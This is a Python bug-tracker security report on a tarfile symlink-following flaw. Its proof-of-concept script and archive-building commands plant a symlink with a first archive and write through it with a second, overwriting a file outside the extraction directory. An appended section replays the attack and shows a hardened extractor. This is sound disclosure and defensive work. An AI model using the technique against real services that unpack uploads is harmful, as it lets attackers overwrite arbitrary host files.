New submission from guangli dong <leve...@gmail.com>:
If a file is uncompressed twice to the same dir, the attacker can "write any content to any file on the host". PoC code below:

```python
import tarfile

dir_name = "/tmp/anything"
# ln -sv /tmp/a test_tar/a; tar -cvf a.tar.gz test_tar/a
file1_name = "/tmp/a.tar.gz"
# echo "it is just poc" > /tmp/payload; rm -rf test_tar; mkdir test_tar; cp /tmp/payload test_tar/a; tar -cvf b.tar.gz test_tar/a
file2_name = "/tmp/b.tar.gz"


def vuln_tar(tar_path):
    """
    :param tar_path: path of the (attacker-supplied) archive to extract
    :return: None
    """
    tar = tarfile.open(tar_path, "r:tar")
    file_names = tar.getnames()
    for file_name in file_names:
        # extract() opens the target path for writing, following any symlink already there
        tar.extract(file_name, dir_name)
    tar.close()


vuln_tar(file1_name)
vuln_tar(file2_name)
```

In this PoC code, if a service uncompresses a tar file uploaded by the attacker to "dir_name" twice, the attacker can create "/tmp/a" and write the string "it is just poc" into the "/tmp/a" file.

----------
components: Library (Lib)
files: poc.tar.gz
messages: 392827
nosy: leveryd
priority: normal
severity: normal
status: open
title: "tarfile" library will lead to "write any content to any file on the host".
type: security
versions: Python 3.7
Added file: https://bugs.python.org/file50005/poc.tar.gz

_______________________________________
Python tracker <rep...@bugs.python.org>
<https://bugs.python.org/issue44023>
_______________________________________
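The two-archive sequence from the report, replayed in a scratch directory next to a hardened extractor that resolves each target path through any symlink already present under the destination before writing; this is an added example, not the reporter's PoC or CPython code. `make_tar`, `naive_extract`, `safe_extract`, `demo`, the in-memory archives and the `victim` path standing in for /tmp/a are all constructed here; on CPython versions that have extraction filters the naive step pins `filter="fully_trusted"` so it behaves like the 3.7 code in the report.

```python
import io, os, tarfile, tempfile

_TRUSTED = {"filter": "fully_trusted"} if hasattr(tarfile, "data_filter") else {}  # pre-filter behaviour on 3.12+

def make_tar(members):
    """In-memory tar from (name, linkname or None, data) tuples (constructed sample archives)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, linkname, data in members:
            info = tarfile.TarInfo(name)
            if linkname:
                info.type, info.linkname = tarfile.SYMTYPE, linkname
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    buf.seek(0)
    return buf

def naive_extract(tar_bytes, dest):
    """The report's pattern: trust the archive and extract every member as-is."""
    with tarfile.open(fileobj=tar_bytes, mode="r:") as tar:
        tar.extractall(dest, **_TRUSTED)

def safe_extract(tar_bytes, dest):
    """Hardened: write a member only if its path, resolved through any symlink already under dest, stays inside dest."""
    dest = os.path.realpath(dest)
    def inside(path):
        return os.path.commonpath([dest, os.path.realpath(path)]) == dest
    rejected = []
    with tarfile.open(fileobj=tar_bytes, mode="r:") as tar:
        for m in tar.getmembers():
            target = os.path.join(dest, m.name)
            # a symlink member must itself point inside dest, or it is the first half of the attack
            link_ok = not m.issym() or inside(os.path.join(os.path.dirname(target), m.linkname))
            if inside(target) and link_ok:
                tar.extract(m, dest, **_TRUSTED)
            else:
                rejected.append(m.name)
    return rejected

def demo():
    """Replay the report: archive 1 plants the symlink, archive 2 is written through it."""
    root = os.path.realpath(tempfile.mkdtemp())
    victim = os.path.join(root, "victim")   # stands in for /tmp/a in the report
    dest = os.path.join(root, "uploads")    # stands in for dir_name
    second = [("test_tar/a", None, b"it is just poc")]
    naive_extract(make_tar([("test_tar/a", victim, b"")]), dest)
    naive_extract(make_tar(second), dest)
    written = open(victim).read()           # the file outside dest now holds the payload
    os.remove(victim)
    rejected = safe_extract(make_tar(second), dest)   # same archive, hardened: refused
    return written, os.path.exists(victim), rejected
```

On CPython versions that ship extraction filters, `filter="data"` (PEP 706) performs this realpath containment check inside the library, so prefer it over a hand-rolled extractor where available.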